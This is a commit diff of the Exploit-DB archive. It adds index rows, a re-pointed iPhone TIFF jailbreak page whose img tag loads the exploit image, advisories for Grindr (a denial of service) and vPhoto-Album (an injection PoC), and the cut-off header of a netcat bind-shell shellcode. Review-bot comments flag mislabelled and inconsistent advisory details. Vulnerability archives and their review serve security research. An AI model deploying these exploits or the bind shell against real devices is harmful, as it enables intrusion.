DB: 2015-05-07
9 new exploits
This commit is contained in:
parent
dc83e39d07
commit
b2d25f8fa5
12 changed files with 815 additions and 79 deletions
11
files.csv
@ -4164,6 +4164,7 @@ id,file,description,date,author,platform,type,port
4519,platforms/php/webapps/4519.txt,"Pindorama 0.1 client.php Remote File Inclusion Vulnerability",2007-10-11,S.W.A.T.,php,webapps,0
|
||||
4520,platforms/php/webapps/4520.txt,"PicoFlat CMS <= 0.4.14 index.php Remote File Inclusion Vulnerability",2007-10-11,0in,php,webapps,0
|
||||
4521,platforms/php/webapps/4521.txt,"Joomla Flash uploader 2.5.1 - Remote File Inclusion Vulnerabilities",2007-10-11,mdx,php,webapps,0
|
||||
4522,platforms/hardware/remote/4522.html,"Apple iTouch/iPhone 1.1.1 - '.tif' File Remote Jailbreak Exploit",2007-10-11,"Niacin and Dre",hardware,remote,0
|
||||
4523,platforms/php/webapps/4523.pl,"KwsPHP 1.0 Newsletter Module Remote SQL Injection Exploit",2007-10-11,s4mi,php,webapps,0
|
||||
4524,platforms/php/webapps/4524.txt,"joomla component com_colorlab 1.0 - Remote File Inclusion Vulnerability",2007-10-12,"Mehmet Ince",php,webapps,0
|
||||
4525,platforms/php/webapps/4525.pl,"TikiWiki <= 1.9.8 tiki-graph_formula.php Command Execution Exploit",2007-10-12,str0ke,php,webapps,0
|
||||
|
@ -33207,7 +33208,7 @@ id,file,description,date,author,platform,type,port
|
|||
36800,platforms/php/webapps/36800.txt,"Wordpress NEX-Forms < 3.0 - SQL Injection Vulnerability",2015-04-21,"Claudio Viviani",php,webapps,0
|
||||
36801,platforms/php/webapps/36801.txt,"WordPress MiwoFTP Plugin <= 1.0.5 - Arbitrary File Download",2015-04-21,"dadou dz",php,webapps,0
|
||||
36802,platforms/php/webapps/36802.txt,"WordPress Tune Library Plugin 1.5.4 - SQL Injection Vulnerability",2015-04-21,"Hannes Trunde",php,webapps,0
|
||||
36803,platforms/windows/remote/36803.py,"ProFTPd 1.3.5 (mod_copy) - Remote Command Execution",2015-04-21,R-73eN,windows,remote,0
|
||||
36803,platforms/linux/remote/36803.py,"ProFTPd 1.3.5 (mod_copy) - Remote Command Execution",2015-04-21,R-73eN,linux,remote,0
|
||||
36804,platforms/php/webapps/36804.pl,"MediaSuite CMS - Artibary File Disclosure Exploit",2015-04-21,"KnocKout inj3ct0r",php,webapps,0
|
||||
36805,platforms/php/webapps/36805.txt,"WordPress Community Events Plugin 1.3.5 - SQL Injection Vulnerability",2015-04-21,"Hannes Trunde",php,webapps,0
|
||||
36808,platforms/windows/remote/36808.rb,"Adobe Flash Player copyPixelsToByteArray Integer Overflow",2015-04-21,metasploit,windows,remote,0
|
||||
|
@ -33293,12 +33294,20 @@ id,file,description,date,author,platform,type,port
|
|||
36898,platforms/php/webapps/36898.txt,"Etano 1.20/1.22 search.php Multiple Parameter XSS",2012-03-05,"Aung Khant",php,webapps,0
|
||||
36899,platforms/php/webapps/36899.txt,"Etano 1.20/1.22 photo_search.php Multiple Parameter XSS",2012-03-05,"Aung Khant",php,webapps,0
|
||||
36900,platforms/php/webapps/36900.txt,"Etano 1.20/1.22 photo_view.php return Parameter XSS",2012-03-05,"Aung Khant",php,webapps,0
|
||||
36914,platforms/php/webapps/36914.txt,"Fork CMS 3.2.x Multiple Cross Site Scripting and HTML Injection Vulnerabilities",2012-03-06,"Gjoko Krstic",php,webapps,0
|
||||
36915,platforms/windows/remote/36915.txt,"NetDecision 4.6.1 Multiple Directory Traversal Vulnerabilities",2012-03-07,"Luigi Auriemma",windows,remote,0
|
||||
36916,platforms/php/webapps/36916.txt,"Exponent CMS 2.0 'src' Parameter SQL Injection Vulnerability",2012-03-07,"Rob Miller",php,webapps,0
|
||||
36917,platforms/php/webapps/36917.txt,"OSClass 2.3.x Directory Traversal and Arbitrary File Upload Vulnerabilities",2012-03-07,"Filippo Cavallarin",php,webapps,0
|
||||
36909,platforms/windows/local/36909.rb,"RM Downloader 2.7.5.400 - Local Buffer Overflow (MSF)",2015-05-04,"TUNISIAN CYBER",windows,local,0
|
||||
36910,platforms/php/webapps/36910.txt,"Open Realty 2.5.x 'select_users_template' Parameter Local File Include Vulnerability",2012-03-05,"Aung Khant",php,webapps,0
|
||||
36911,platforms/php/webapps/36911.txt,"11in1 CMS 1.2.1 admin/comments topicID Parameter SQL Injection",2012-03-05,"Chokri B.A",php,webapps,0
|
||||
36912,platforms/php/webapps/36912.txt,"11in1 CMS 1.2.1 admin/tps id Parameter SQL Injection",2012-03-05,"Chokri B.A",php,webapps,0
|
||||
36913,platforms/php/webapps/36913.pl,"Joomla! 'redirect.php' SQL Injection Vulnerability",2012-03-05,"Colin Wong",php,webapps,0
|
||||
36903,platforms/ios/dos/36903.txt,"Grindr 2.1.1 iOS - Denial of Service",2015-05-04,Vulnerability-Lab,ios,dos,0
|
||||
36904,platforms/ios/webapps/36904.txt,"PhotoWebsite 3.1 iOS - File Include Web Vulnerability",2015-05-04,Vulnerability-Lab,ios,webapps,0
|
||||
36920,platforms/windows/local/36920.py,"Mediacoder 0.8.34.5716 - Buffer Overflow SEH Exploit (.m3u)",2015-05-06,evil_comrade,windows,local,0
|
||||
36921,platforms/lin_x86/shellcode/36921.c,"Linux x86 - /bin/nc -le /bin/sh -vp 17771 Shellcode (58 Bytes)",2015-05-06,"Oleg Boytsev",lin_x86,shellcode,0
|
||||
36922,platforms/ios/webapps/36922.txt,"vPhoto-Album 4.2 iOS - File Include Web Vulnerability",2015-05-06,Vulnerability-Lab,ios,webapps,0
|
||||
36906,platforms/linux/dos/36906.txt,"Apache Xerces-C XML Parser < 3.1.2 - DoS POC",2015-05-04,beford,linux,dos,0
|
||||
36907,platforms/php/webapps/36907.txt,"Wordpress Ultimate Product Catalogue 3.1.2 - Multiple Persistent XSS & CSRF & File Upload",2015-05-04,"Felipe Molina",php,webapps,0
|
||||
36908,platforms/lin_x86/shellcode/36908.c,"linux/x86 - exit(0) (6 bytes)",2015-05-04,"Febriyanto Nugroho",lin_x86,shellcode,0
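Review bot: The new 36922 row at L118 describes the entry as a "File Include Web Vulnerability", but the advisory it indexes shows an album `name` being written unescaped into the WiFi web UI via `document.write(albumArray[i+0].name+...)` and rendered as `"><[FILE INCLUDE VULNERABILITY!]>`, which is an HTML/script injection (stored XSS) rather than inclusion of a local file. The description column is what searches and triage key on, so I would align it with the demonstrated behaviour, e.g. `36922,platforms/ios/webapps/36922.txt,"vPhoto-Album 4.2 iOS - Album Name HTML/Script Injection (WiFi Web Interface)",2015-05-06,Vulnerability-Lab,ios,webapps,0`. The same check probably applies to the 36904 row (`PhotoWebsite 3.1 iOS - File Include Web Vulnerability`, L109) if that advisory follows the same template, though its file is not in view here.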
@ -1,31 +1,31 @@
<!--
|
||||
The iPhone / iTouch tif exploit is now officially released!
|
||||
source: http://www.toc2rta.com/
|
||||
|
||||
So its offical we have released the tiff exploit code.
|
||||
You can navigate in safari to http://jailbreak.toc2rta.com
|
||||
on your Itouch or Iphone 1.1.1. It will crash your Safari
|
||||
but then you will be able to browse the file system with
|
||||
full read/write access. This is only for people who understand
|
||||
what they are doing. You will need IPHUC and some knowledge of
|
||||
how to put/get files.
|
||||
|
||||
TUTORIAL FOR WINDOWS http://www.ipodtouchfans.com/forums/showthread.php?t=1570
|
||||
|
||||
Check back later for a full breakdown of how the
|
||||
tiff works and what the future holds for Toc2rta and the
|
||||
Itouch & Iphone.
|
||||
|
||||
Exploit by Niacin and Dre.
|
||||
|
||||
A special thanks to Pumpkin,dinopio,davidc,natetrue,Smileydude,neimod
|
||||
,Nervegas,erica,roxfan,phire and the rest of the dev team for all
|
||||
their work that helped make this happen. You can visit the dev team's
|
||||
site here : http://iphone.fiveforty.net/wiki/index.php?title=Main_Page
|
||||
-->
|
||||
|
||||
<html>
|
||||
<img src="http://www.milw0rm.com/sploits/10112007-iphone.tif">
|
||||
</html>
|
||||
|
||||
# milw0rm.com [2007-10-11]
|
||||
<!--
|
||||
The iPhone / iTouch tif exploit is now officially released!
|
||||
source: http://www.toc2rta.com/
|
||||
|
||||
So its offical we have released the tiff exploit code.
|
||||
You can navigate in safari to http://jailbreak.toc2rta.com
|
||||
on your Itouch or Iphone 1.1.1. It will crash your Safari
|
||||
but then you will be able to browse the file system with
|
||||
full read/write access. This is only for people who understand
|
||||
what they are doing. You will need IPHUC and some knowledge of
|
||||
how to put/get files.
|
||||
|
||||
TUTORIAL FOR WINDOWS http://www.ipodtouchfans.com/forums/showthread.php?t=1570
|
||||
|
||||
Check back later for a full breakdown of how the
|
||||
tiff works and what the future holds for Toc2rta and the
|
||||
Itouch & Iphone.
|
||||
|
||||
Exploit by Niacin and Dre.
|
||||
|
||||
A special thanks to Pumpkin,dinopio,davidc,natetrue,Smileydude,neimod
|
||||
,Nervegas,erica,roxfan,phire and the rest of the dev team for all
|
||||
their work that helped make this happen. You can visit the dev team's
|
||||
site here : http://iphone.fiveforty.net/wiki/index.php?title=Main_Page
|
||||
-->
|
||||
|
||||
<html>
|
||||
<img src="https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/10112007-iphone.tif">
|
||||
</html>
|
||||
|
||||
# milw0rm.com [2007-10-11]
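Review bot: The new `<img src>` at L299 fetches the exploit TIFF from `.../raw/master/sploits/10112007-iphone.tif`, a mutable branch reference, so the bytes this PoC loads can change or be replaced without any change to this file; for an artifact whose only purpose is to reproduce a specific 2007 jailbreak it would be safer to pin the blob to a commit, e.g. `https://github.com/offensive-security/exploit-database-bin-sploits/raw/<commit-sha>/sploits/10112007-iphone.tif`, and record the expected SHA-256 of the TIFF in the header comment so a reader can verify what they downloaded. Simply opening this HTML in a browser triggers the fetch and rendering of the exploit image, which the existing comment block does not say; a line such as `WARNING: opening this page in a browser fetches and renders the exploit TIFF` at the top of the comment would help anyone browsing the archive. The move from plain-HTTP milw0rm to HTTPS is itself an improvement over the removed line.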
162
platforms/ios/dos/36903.txt
Executable file
@ -0,0 +1,162 @@
Document Title:
|
||||
===============
|
||||
Grindr 2.1.1 iOS Bug Bounty #2 - Denial of Service Software Vulnerability
|
||||
|
||||
|
||||
References (Source):
|
||||
====================
|
||||
http://www.vulnerability-lab.com/get_content.php?id=1418
|
||||
|
||||
|
||||
Release Date:
|
||||
=============
|
||||
2015-05-02
|
||||
|
||||
|
||||
Vulnerability Laboratory ID (VL-ID):
|
||||
====================================
|
||||
1418
|
||||
|
||||
|
||||
Common Vulnerability Scoring System:
|
||||
====================================
|
||||
3.3
|
||||
|
||||
|
||||
Product & Service Introduction:
|
||||
===============================
|
||||
Grindr, which first launched in 2009, has exploded into the largest and most popular all-male location-based social network out there.
|
||||
With more than 5 million guys in 192 countries around the world -- and approximately 10,000 more new users downloading the app
|
||||
every day -- you’ll always find a new date, buddy, or friend on Grindr. Grindr is a simple app that uses your mobile device’s
|
||||
location-based services to show you the guys closest to you who are also on Grindr. How much of your info they see is
|
||||
entirely your call.
|
||||
|
||||
(Copy of the Vendor Homepage: http://grindr.com/learn-more )
|
||||
|
||||
|
||||
Abstract Advisory Information:
|
||||
==============================
|
||||
The Vulnerability Laboratory Research Team discovered a local and remote denial of servie vulnerability in the official Grindr v2.1.1 iOS mobile web-application.
|
||||
|
||||
|
||||
Vulnerability Disclosure Timeline:
|
||||
==================================
|
||||
2015-01-22: Researcher Notification & Coordination (Benjamin Kunz Mejri - Evolution Security)
|
||||
2015-01-22: Vendor Notification (Grinder - Bug Bounty Program)
|
||||
2015-02-02: Vendor Response/Feedback (Grinder - Bug Bounty Program)
|
||||
2015-04-01: Vendor Fix/Patch (Grindr Developer Team - Reward: x & Manager: x)
|
||||
2015-05-04: Public Disclosure (Vulnerability Laboratory)
|
||||
|
||||
|
||||
Discovery Status:
|
||||
=================
|
||||
Published
|
||||
|
||||
|
||||
Affected Product(s):
|
||||
====================
|
||||
Grindr LLC
|
||||
Product: Grinder - iOS Mobile Web Application (API) 2.2.1
|
||||
|
||||
|
||||
Exploitation Technique:
|
||||
=======================
|
||||
Remote
|
||||
|
||||
|
||||
Severity Level:
|
||||
===============
|
||||
Medium
|
||||
|
||||
|
||||
Technical Details & Description:
|
||||
================================
|
||||
A local and remote Denial of Service vulnerability has been discovered in the official Grindr v2.1.1 iOS mobile web-application.
|
||||
|
||||
The attacker injects a script code tag or multiple termination strings (%00%20%00%20%00) to the Display Name input field of the Edit Profile module.
|
||||
After the inject the service stored the malicious values as DisplayName. After the inject a random user is processing to click in the profile the
|
||||
contact information (facebook/twitter). After that the victim wants to copy the link and an internal service corruption occurs thats crashs the mobile app.
|
||||
The issue is local and remote exploitable.
|
||||
|
||||
Vulnerable Module(s):
|
||||
[+] Edit Profile
|
||||
|
||||
Vulnerable Parameter(s): (Input)
|
||||
[+] Display Name
|
||||
|
||||
Affected Module(s):
|
||||
[+] Contact > Social Network > Copy Link
|
||||
|
||||
|
||||
|
||||
Proof of Concept (PoC):
|
||||
=======================
|
||||
The denial of service web vulnerability can be exploited by remote attacker and local user accounts with low user interaction (click).
|
||||
To demonstrate the vulnerability or to reproduce the issue follow the provided information and steps below to continue.
|
||||
|
||||
Manual steps to reproduce ...
|
||||
1. Open the grindr mobile application
|
||||
2. Inject a script code tag as Display Name or use the terminated String with empty values
|
||||
3. Save and click in the profile the contact button (exp. facebook)
|
||||
4. Click to the send button ahead and push the Copy Link function
|
||||
5. The app service is getting terminated with an uncaught exception because of an internal parsing error
|
||||
|
||||
Note:To exploit the issue remotly the profile needs to be shared with another user and then the user only needs to push the same way the social contact button.
|
||||
|
||||
PoC Video:
|
||||
|
||||
|
||||
Solution - Fix & Patch:
|
||||
=======================
|
||||
First step is to prevent the issue by a secure restriction of the input. Attach a own excpetion-handling to prevent next to the insert itself.
|
||||
The social network accounts that are linked do not allow special chars in the username. The grindr ios app and the android app allows to register
|
||||
an account and to insert own scripts <html5> or null strings that corrupts the process of copy the link by an error. After the restriction has been
|
||||
set in the code of both (api) the issue can not anymore execute to shutdown anothers users account. Even if this issue execution is prevented that
|
||||
was only a solution to prevent.
|
||||
|
||||
To fix the bug ...
|
||||
Connect for example ios device with the running app to windows. Sync the process and reproduce the remote error and local error. Move to the iOS error
|
||||
folder that has been synced. Get the error attach another debugger and so on ...
|
||||
|
||||
|
||||
Security Risk:
|
||||
==============
|
||||
The secuirty risk of the local and remote denial of service vulnerability in the copy link function that corrupts is estimated as medium.
|
||||
|
||||
|
||||
Credits & Authors:
|
||||
==================
|
||||
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
|
||||
|
||||
|
||||
Disclaimer & Information:
|
||||
=========================
|
||||
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
|
||||
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
|
||||
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
|
||||
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
|
||||
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
|
||||
policies, deface websites, hack into databases or trade with fraud/stolen material.
|
||||
|
||||
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
|
||||
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
|
||||
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
|
||||
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
|
||||
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
|
||||
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
|
||||
|
||||
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
|
||||
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
|
||||
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
|
||||
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
|
||||
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
|
||||
|
||||
Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™
|
||||
|
||||
--
|
||||
VULNERABILITY LABORATORY - RESEARCH TEAM
|
||||
SERVICE: www.vulnerability-lab.com
|
||||
CONTACT: research@vulnerability-lab.com
|
||||
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
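Review bot: The "Affected Product(s)" block at L477 lists version 2.2.1 and spells the vendor "Grinder", while the title, abstract and technical details (L328, L423, L516) all say Grindr v2.1.1; one of these is wrong, and the product line is the field that gets copied into CPE-style trackers, so it should read `Product: Grindr - iOS Mobile Web Application (API) 2.1.1` (the "Grinder" spelling at L439 and L442 should be fixed as well). The severity is also internally inconsistent: a CVSS score of 3.3 (L380) falls in the Low band of CVSS v2 (0.0-3.9), yet L503 and L651 rate the issue Medium. The PoC (L521, L583) never shows the exact Display Name payload that was saved — "a script code tag" and `%00%20%00%20%00` are described but not given as the literal submitted string — so a reader can neither reproduce the crash nor write a detection for it; the advisory should quote the exact value stored as DisplayName and state whether the uncaught exception at L592 is raised in the iOS client or in the web API, since L423 and L530 claim both local and remote exploitability without distinguishing the two.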
263
platforms/ios/webapps/36922.txt
Executable file
@ -0,0 +1,263 @@
Document Title:
|
||||
===============
|
||||
vPhoto-Album v4.2 iOS - File Include Web Vulnerability
|
||||
|
||||
|
||||
References (Source):
|
||||
====================
|
||||
http://www.vulnerability-lab.com/get_content.php?id=1477
|
||||
|
||||
|
||||
Release Date:
|
||||
=============
|
||||
2015-05-05
|
||||
|
||||
|
||||
Vulnerability Laboratory ID (VL-ID):
|
||||
====================================
|
||||
1477
|
||||
|
||||
|
||||
Common Vulnerability Scoring System:
|
||||
====================================
|
||||
6.2
|
||||
|
||||
|
||||
Product & Service Introduction:
|
||||
===============================
|
||||
vPhoto Pro is your side of the most powerful local album management software that allows you to easily manage your massive photos,
|
||||
while giving you an unprecedented user experience. No in-app purchase, no functional limitations.
|
||||
|
||||
(Copy of the Homepage: https://itunes.apple.com/us/app/veryphoto-album-password-wifi/id720810114 )
|
||||
|
||||
|
||||
Abstract Advisory Information:
|
||||
==============================
|
||||
The Vulnerability Laboratory Research team discovered a local file include web vulnerability in the official vPhoto-Album v4.2 iOS mobile web-application.
|
||||
|
||||
|
||||
Vulnerability Disclosure Timeline:
|
||||
==================================
|
||||
2015-05-05: Public Disclosure (Vulnerability Laboratory)
|
||||
|
||||
|
||||
Discovery Status:
|
||||
=================
|
||||
Published
|
||||
|
||||
|
||||
Affected Product(s):
|
||||
====================
|
||||
Cheng Chen
|
||||
Product: vPhoto-Album - iOS Web Application (Wifi) 4.1
|
||||
|
||||
|
||||
Exploitation Technique:
|
||||
=======================
|
||||
Remote
|
||||
|
||||
|
||||
Severity Level:
|
||||
===============
|
||||
High
|
||||
|
||||
|
||||
Technical Details & Description:
|
||||
================================
|
||||
A local file include web vulnerability has been discovered in the official vPhoto-Album v4.2 iOS mobile web-application.
|
||||
The local file include web vulnerability allows remote attackers to unauthorized include local file/path requests or system
|
||||
specific path commands to compromise the mobile web-application.
|
||||
|
||||
The vulnerability is located in the `name` value of the wifi interface module. Local attackers are able to manipulate the
|
||||
wifi web interface by usage of the vulnerable sync function. The sync does not encode or parse the context of the albumname.
|
||||
|
||||
Local attacker are able to manipulate the input of the folder path value to exploit the issue by web-application sync.
|
||||
The execution of unauthorized local file or path request occurs in the index file dir listing module of the wifi web-application.
|
||||
The request method to inject is a sync and the attack vector is located on the application-side of the affected service.
|
||||
|
||||
The security risk of the local file include web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 7.1.
|
||||
Exploitation of the file include web vulnerability requires no user interaction or privileged web-application user account. Successful exploitation
|
||||
of the local file include web vulnerability results in mobile application or connected device component compromise.
|
||||
|
||||
Vulnerable Method(s):
|
||||
[+] [Sync]
|
||||
|
||||
Vulnerable Module(s):
|
||||
[+] Albumname
|
||||
|
||||
Vulnerable Parameter(s):
|
||||
[+] name
|
||||
|
||||
Affected Module(s):
|
||||
[+] File Dir Index
|
||||
|
||||
|
||||
Proof of Concept (PoC):
|
||||
=======================
|
||||
The local file include web vulnerability can be exploited by local attackers with restricted physical device access and no user interaction.
|
||||
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
|
||||
|
||||
|
||||
PoC: http://localhost:8080/
|
||||
|
||||
<script type="text/javascript">
|
||||
var albumArray = getAllAlbum();
|
||||
var numberOfAlbums = getNumberOfAlbums();
|
||||
|
||||
for (var i=0; i<numberOfAlbums; i=i+4)
|
||||
{
|
||||
document.write("<tr>");
|
||||
|
||||
document.write("<td height=\"170\" width=\"150\">");
|
||||
if (i+0 < numberOfAlbums)
|
||||
{
|
||||
document.write("<p align=\"center\"><img border=\"0\" src=\"getCoverImage?"+encodeURI(JSON.stringify(albumArray[i+0]))+"\" width=\"170\" height=\"150\" onclick=albumClick('"+(i+0)+"')>");
|
||||
}
|
||||
document.write("</td>");
|
||||
|
||||
document.write("<td height=\"170\" width=\"50\"></td>");
|
||||
|
||||
document.write("<td height=\"170\" width=\"150\">");
|
||||
if (i+1 < numberOfAlbums)
|
||||
{
|
||||
document.write("<p align=\"center\"><img border=\"0\" src=\"getCoverImage?"+encodeURI(JSON.stringify(albumArray[i+1]))+"\" width=\"170\" height=\"150\" onclick=albumClick('"+(i+1)+"')>");
|
||||
}
|
||||
document.write("</td>");
|
||||
|
||||
document.write("<td height=\"170\" width=\"50\"></td>");
|
||||
|
||||
document.write("<td height=\"170\" width=\"150\">");
|
||||
if (i+2 < numberOfAlbums)
|
||||
{
|
||||
document.write("<p align=\"center\"><img border=\"0\" src=\"getCoverImage?"+encodeURI(JSON.stringify(albumArray[i+2]))+"\" width=\"170\" height=\"150\" onclick=albumClick('"+(i+2)+"')>");
|
||||
}
|
||||
document.write("</td>");
|
||||
|
||||
document.write("<td height=\"170\" width=\"50\"></td>");
|
||||
|
||||
document.write("<td height=\"170\" width=\"150\">");
|
||||
if (i+3 < numberOfAlbums)
|
||||
{
|
||||
document.write("<p align=\"center\"><img border=\"0\" src=\"getCoverImage?"+encodeURI(JSON.stringify(albumArray[i+3]))+"\" width=\"170\" height=\"150\" onclick=albumClick('"+(i+3)+"')>");
|
||||
}
|
||||
document.write("</td>");
|
||||
|
||||
document.write("</tr>");
|
||||
|
||||
|
||||
document.write("<tr>");
|
||||
|
||||
document.write("<td height=\"20\" > <p align=\"center\">");
|
||||
if (i+0 < numberOfAlbums)
|
||||
{
|
||||
|
||||
document.write("<font face=\"Courier New\" size=\"2\">");
|
||||
document.write(albumArray[i+0].name+"("+albumArray[i+0].numberOfImage+")");
|
||||
document.write("</font>");
|
||||
}
|
||||
document.write("</td>");
|
||||
|
||||
document.write("<td height=\"20\" width=\"50\"></td>");
|
||||
|
||||
document.write("<td height=\"20\" > <p align=\"center\">");
|
||||
if (i+1 < numberOfAlbums)
|
||||
{
|
||||
|
||||
|
||||
document.write("<font face=\"Courier New\" size=\"2\">");
|
||||
document.write(albumArray[i+1].name+"("+albumArray[i+1].numberOfImage+")");
|
||||
document.write("</font>");
|
||||
}
|
||||
document.write("</td>");
|
||||
|
||||
document.write("<td height=\"20\" width=\"50\"></td>");
|
||||
|
||||
document.write("<td height=\"20\" > <p align=\"center\">");
|
||||
if (i+2 < numberOfAlbums)
|
||||
{
|
||||
|
||||
document.write("<font face=\"Courier New\" size=\"2\">");
|
||||
document.write(albumArray[i+2].name+"("+albumArray[i+2].numberOfImage+")");
|
||||
document.write("</font>");
|
||||
}
|
||||
document.write("</td>");
|
||||
|
||||
document.write("<td height=\"20\" width=\"50\"></td>");
|
||||
|
||||
|
||||
document.write("<td height=\"20\" > <p align=\"center\">");
|
||||
if (i+3 < numberOfAlbums)
|
||||
{
|
||||
|
||||
document.write("<font face=\"Courier New\" size=\"2\">");
|
||||
document.write(albumArray[i+3].name+"("+albumArray[i+3].numberOfImage+")");
|
||||
document.write("</font>");
|
||||
}
|
||||
document.write("</td>");
|
||||
|
||||
document.write("</tr>");
|
||||
|
||||
|
||||
document.write("<tr>");
|
||||
|
||||
document.write("<td height=\"20\" colspan=\"7\">"); document.write("</td>");
|
||||
|
||||
document.write("</tr>");
|
||||
}
|
||||
|
||||
</script>
|
||||
<tr><td height="170" width="150"><p align="center"><img src="getCoverImage?%7B%22name%22:%22%5C%22%3E%3C[FILE INCLUDE VULNERABILITY!]%3E%22,%22type%22:%222%22,%22groupType%22:2,%22url%22:%22assets-library://group/?id=B94CC6C9-FB2C-4BFD-8BA4-0925E51146A1&filter=1537%22,%22numberOfImage%22:%222%22%7D" onclick="albumClick('0')" border="0" height="150" width="170"></p></td><td height="170" width="50"></td><td height="170" width="150"><p align="center"><img src="getCoverImage?%7B%22name%22:%22Camera%20Roll%22,%22type%22:%222%22,%22groupType%22:16,%22url%22:%22assets-library://group/?id=70169F06-36C7-430C-AA4F-55B95E268426%22,%22numberOfImage%22:%222%22%7D" onclick="albumClick('1')" border="0" height="150" width="170"></p></td><td height="170" width="50"></td><td height="170" width="150"></td><td height="170" width="50"></td><td height="170" width="150"></td></tr><tr><td height="20"> <p align="center"><font face="Courier New" size="2">"><C[FILE INCLUDE VULNERABILITY!]>(2)</font></td><td height="20" width="50"></td><td height="20" > <p align="center"><font face="Courier New" size="2">Camera Roll(2)</font></td><td height="20" width="50"></td><td height="20" > <p align="center"></td><td height="20" width="50"></td><td height="20" > <p align="center"></td></tr><tr><td height="20" colspan="7"></td></tr>
|
||||
</table>
|
||||
</div>
|
||||
</body>
|
||||
</html></iframe></font></p></td></tr></tbody>
|
||||
|
||||
|
||||
Reference(s):
|
||||
http://localhost:8080/
|
||||
|
||||
|
||||
Security Risk:
|
||||
==============
|
||||
The security riskof the local file include web vulnerability in the album values is estimated as high. (CVSS 6.2)
|
||||
|
||||
|
||||
Credits & Authors:
|
||||
==================
|
||||
Vulnerability Laboratory [Research Team] - Katharin S. L. (CH) (research@vulnerability-lab.com) [www.vulnerability-lab.com]
|
||||
|
||||
|
||||
Disclaimer & Information:
|
||||
=========================
|
||||
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
|
||||
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
|
||||
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
|
||||
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
|
||||
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
|
||||
policies, deface websites, hack into databases or trade with fraud/stolen material.
|
||||
|
||||
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
|
||||
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
|
||||
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
|
||||
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
|
||||
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
|
||||
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
|
||||
|
||||
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
|
||||
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
|
||||
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
|
||||
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
|
||||
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
|
||||
|
||||
Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™
|
||||
|
||||
|
||||
|
||||
--
|
||||
VULNERABILITY LABORATORY - RESEARCH TEAM
|
||||
SERVICE: www.vulnerability-lab.com
|
||||
CONTACT: research@vulnerability-lab.com
|
||||
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
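Review bot: The advisory classifies this as a local file include (L773, L859, L940), but everything in the PoC points to HTML/script injection instead: the album `name` is placed unescaped into the page by `document.write(albumArray[i+0].name+"("+...)` (L1179 and its siblings) and into the `getCoverImage?` URL via `encodeURI(JSON.stringify(...))` (L1067), and the captured output at L1324 shows the payload `"><[FILE INCLUDE VULNERABILITY!]>` breaking out of the `<font>` text context — no file path is read or included anywhere in the shown code. The mislabel matters for triage because the real impact, as far as L951-L959 and L1021 describe it, is that an attacker with local access names an album with markup and any WiFi client that later browses the share (presumably at port 8080, L1031) executes attacker-controlled HTML, so the title and "Technical Details" should say persistent HTML/script injection via album name and the remediation should be HTML-encoding `name` before `document.write` and JSON-escaping it before `encodeURI`, not path restrictions. Several header fields also contradict each other and should be reconciled: CVSS 6.2 (L825, L1359) vs 7.1 (L970), version 4.2 in the title vs 4.1 at L901, and "Exploitation Technique: Remote" (L914) vs the PoC's "local attackers with restricted physical device access" (L1021); the accurate statement is local injection with a remote victim.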
51
platforms/lin_x86/shellcode/36921.c
Executable file
@ -0,0 +1,51 @@
/*
|
||||
# Linux x86 /bin/nc -le /bin/sh -vp 17771 shellcode
|
||||
# This shellcode will listen on port 17771 and give you /bin/sh
|
||||
